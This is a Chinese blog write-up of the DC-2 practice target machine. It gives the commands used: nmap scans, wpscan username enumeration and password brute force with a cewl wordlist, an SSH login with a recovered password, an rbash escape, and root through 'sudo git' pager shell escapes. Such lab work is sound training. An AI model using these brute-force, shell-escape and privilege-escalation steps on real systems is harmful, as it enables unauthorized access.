DC-2靶机渗透练习

前言

长夜漫漫,无心睡眠。不妨做做靶机渗透,之前就打了一个靶机。今天我们把这个DC-2给他搞掉

主机发现

我们在攻击这个靶机之前,我们需要把DC-2靶机改成NAT模式并记录下MAC地址因为寻找主机ip时会用到。靶机默认的模式是桥接模式。具体如何操作,我们在DC-1的分享当中有了说明。这里不再予以展示。

首先我们利用kali自带的nmap扫描一下端口。 nmap -sP 192.168.56.0/24 

 

 

 根据我们所知道的mac地址就可以确定,主机ip为 192.168.56.175 

信息收集

然后我们需要再使用nmap扫描一下nmap -A -T4 -p- 192.168.56.175 

 

 

 从中我们可以看出开放端口有80与7744。80跑的是http,7744跑的是ssh

Flag1

然后我们访问一下80端口

 

 

 

 然后我们这里需要改一下hosts文件,使用命令 vim /etc/hosts 进入hosts文件里去修改。 /etc/hosts 是此文件的路径。

 

 

 把主机的ip加上dc-2,这回可以正常访问了,这里有个重定向直接跳转dc-2,然后我们访问一下

 

 

然后我们可以直接在主页上面访问Flag,然后找到flag1

 

 

 看提示,我们需要使用cewl。

Flag2

通过flag1的提示,我们需要使用cewl爆破出用户名和密码,我们先使用wpscan扫描一下,查一下用户名 wpscan --url http://dc-2/ -e u 

 

 

 这三个是我们扫出来的用户名。我们将这三个用户名保存到users.txt文件里

 

 

 然后使用cewl生成密码 cewl -w 7.txt http://dc-2/ 

查看一下7.txt里的内容

 

 

 然后进行密码爆破: wpscan --ignore-main-redirect --url 192.168.56.175 -U users.txt -P 7.txt --force 

 

 

 爆出来了。

 

 

 访问这个地址,然后登录,这里使用jerry登录一下,

 

 

 这样就发现了Flag2,打开看看

 flag2中提示我们如果不能继续攻击 wordPress就想想其他方法吧,还记得7744端口跑的ssh吗,我们尝试下它。

Flag3

我们现在尝试一下ssh远程登录

用户名:tom;密码:parturient。ssh登录tom用户 ssh tom@192.168.56.175 -p 7744 

 

 

 登录成功。我们用ls浏览一下,发现flag3.txt,但是cat的时候却不成功了

 

 

 利用rbash逃逸,先查看看可以使用的命令 echo $PATH 

echo /home/tom/usr/bin/* 

 

 

 less、ls、vi命令可以使用

绕过方法:

less绕过:$less test !‘sh’ls

绕过:$man ls !‘sh’vi

绕过:$vi test !/bin/sh 或 !/bin/bash

这里我们使用这种绕过方法:

BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

 

 

 这样我们想要的就出来了

flag4

flag3提示我们查看jerry用户。我们切换到jerry用户中。 su jerry 我们切换到jerry用户当中去

 

 

 然后查看一下有flag4.txt,cat一下,发现内容

Final flag

flag4告诉我们还没有结束,文中有一个git这是一个很重要的关键词。

 

 

 无法切换到 root目录权限不够,那就是要提权喽。
查看下具有root权限的命令

 

 

 

 

 看到了flag4中提示我们的git,我们使用git进行提权

sudo git help config 或 sudo git -p help
!/bin/bash

这样即可获得root权限,然后获取最后的flag

 

 参考文章

DC-2靶机渗透

笔记

rbash逃逸

 

posted @ 2021-04-12 18:48  AW_SOLE  阅读(162)  评论(0编辑  收藏  举报